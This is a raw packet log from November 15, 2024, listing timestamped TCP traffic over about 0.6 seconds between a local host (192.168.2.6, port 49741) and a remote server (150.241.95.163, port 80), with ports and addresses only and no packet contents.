Nov 15, 2024 10:35:58.684551954 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.685972929 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.686041117 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.702373028 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.702385902 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.702397108 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.702459097 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.712663889 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.712682009 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.712693930 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.712829113 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.712842941 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.712850094 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.712868929 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.712868929 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.712917089 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.751265049 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.751281023 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.751292944 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.751379013 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.751383066 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.751441956 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.751456022 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.751467943 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.751488924 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.751513004 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.752037048 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.752049923 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.752070904 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.752082109 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.752095938 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.752115011 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.774341106 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.774388075 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.774446964 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.774488926 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.774502039 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.774512053 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.774524927 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.774530888 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.774574995 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.777340889 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.777369022 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.777379036 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.777389050 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.777400017 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.777406931 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.777425051 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.801683903 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.801779985 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.801790953 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.801801920 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.801814079 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.801887989 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.801887989 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.801887989 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.801938057 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.801949978 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.801959991 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.802000999 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.802354097 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.802366018 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.802376032 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.802400112 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.802434921 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.819619894 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.819650888 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.819663048 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.819801092 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.829663038 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.829691887 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.829704046 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.829749107 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.829797029 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.829807997 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.829955101 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.829955101 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.830010891 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.830256939 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.830310106 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.868285894 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.868335009 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.868352890 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.868364096 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.868376017 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.868383884 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.868453979 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.868752003 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.868763924 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.868777990 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.868788958 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.868805885 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.868844032 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.868880987 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.868921995 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.891736031 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.891761065 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.891772032 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.891782045 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.891793966 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.891809940 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.891851902 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.894489050 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.894526958 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.894536018 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.894546032 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.894567966 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.894579887 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.894591093 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.894593954 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.894640923 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.925455093 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.925468922 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.925532103 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.925575972 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.925602913 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.925615072 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.925617933 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.925664902 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.925817966 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.925832987 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.925858021 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.925868988 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.925869942 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.925882101 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.925916910 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.926709890 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.926762104 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.927028894 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.936570883 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.936583996 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.936599970 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.936650038 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.936696053 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.946896076 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.946912050 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.946923971 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.946952105 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.946970940 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.946978092 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.946990013 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.946994066 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.947040081 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.985620022 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.985639095 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.985651016 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.985666037 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.985678911 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.985805988 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.985950947 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.985960960 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.985971928 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.985996008 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.986006021 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.986010075 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:58.986028910 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:58.986047029 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.009442091 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.009478092 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.009514093 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.009532928 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.009547949 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.009584904 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.009596109 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.012504101 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.012564898 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.012583017 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.012617111 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.012653112 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.012664080 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.012690067 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.012738943 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.042843103 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.042893887 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.042927980 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.042947054 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.042962074 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.042998075 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.043009043 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.043356895 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.043407917 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.043407917 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.043445110 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.043478012 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.043483973 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.043513060 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.043555975 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.044064999 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.044099092 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.044131994 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.044146061 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.054169893 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.054245949 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.054296970 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.054332018 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.054383993 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.054518938 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.054555893 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.054610014 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.064735889 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.064773083 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.064806938 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.064840078 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.064873934 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.065968037 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.102669001 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.102705956 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.102741003 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.102776051 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.102924109 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.102935076 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.102961063 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.102994919 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.103010893 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.103049040 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.103388071 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.103421926 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.103456974 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.103471994 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.103719950 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.103780985 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.104167938 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.126204014 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.126216888 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.126228094 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.126262903 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.126303911 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.126482964 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.126492977 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.126502037 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.126538992 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.128964901 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.129033089 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.129035950 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.129076958 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.129122019 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.129131079 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.129142046 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.129148006 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.129205942 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.159766912 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.159792900 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.159804106 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.159866095 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.159889936 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.160229921 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.160240889 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.160254002 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.160280943 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.160324097 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.160335064 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.160353899 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.160717964 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.160731077 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.160742998 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.160763979 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.160773993 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.161159992 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.161170959 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.161205053 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.170943022 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.170957088 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.170969009 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.171013117 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.171112061 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.171123981 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.171135902 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.171148062 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.171179056 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.181062937 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.181073904 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.181083918 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.181108952 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.181508064 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.181519032 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.181528091 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.181550026 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.181575060 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.219981909 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.220031023 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.220067978 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.220101118 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.220123053 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.220138073 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.220199108 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.220312119 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.220372915 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.220419884 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.220453978 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.220488071 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.220504045 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.220657110 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.220691919 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.220704079 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.220727921 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.220829964 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.243376970 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.243439913 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.243496895 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.243518114 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.243552923 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.243604898 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.243604898 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.243642092 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.243691921 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.244071960 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.244270086 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.244299889 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.244318962 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.244338036 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.244383097 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.246663094 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.246697903 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.246733904 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.246753931 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.247004032 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.247040033 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.247056007 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.276864052 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.276899099 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.276952982 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.276957989 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.276990891 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.277009964 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.277111053 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.277144909 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.277157068 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.277182102 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.277216911 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.277228117 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.277848005 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.277908087 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.277929068 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.277982950 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.278018951 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.278032064 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.278053999 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.278104067 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:35:59.278671980 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:35:59.288228989 CET	80	49741	150.241.95.163	192.168.2.6
